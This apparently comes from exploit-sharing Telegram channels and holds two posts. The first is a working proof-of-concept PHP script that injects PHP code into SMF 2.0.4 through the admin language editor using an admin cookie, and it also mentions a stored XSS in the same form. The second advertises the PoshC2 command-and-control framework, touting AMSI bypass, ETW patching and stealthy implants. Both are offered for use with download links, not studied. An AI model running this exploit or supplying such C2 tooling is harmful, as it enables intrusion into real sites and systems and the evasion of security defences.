SMF 2.0.4 admin payload code execution

⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.

⚪️ payload code must escape from \', so you should try with something like that:

⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.

⚪️ For character_set - another story, as far as I remember, because here we have

⚪️ a nice stored xss. ;)

⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:

Code:

<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>

#Execution #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/LearnExploit

✨ PoshC2 ✨

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

💬
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python2/Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python2/Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

📊 Other notable features of PoshC2 include:
⚪️ Consistent and Cross-Platform support using Docker.
⚪️ Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
⚪️ A large number of payloads generated out-of-the-box which are frequently updated.
⚪️ Shellcode containing in-build AMSI bypass and ETW patching for a high success rate and stealth.
⚪️ Auto-generated Apache Rewrite rules for use in a C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
⚪️ A modular and extensible format allowing users to create or edit C#, PowerShell or Python3 modules which can be run in-memory by the Implants.
⚪️ Notifications on receiving a successful Implant via Pushover or Slack.
⚪️ A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history and suggestions.
⚪️ Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
⚪️ Client/Server format allowing multiple team members to utilise a single C2 server.
⚪️

😸 Github

⬇️ Download
🔒 LearnExploit

#Payload #C2 #Proxy #Aware
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit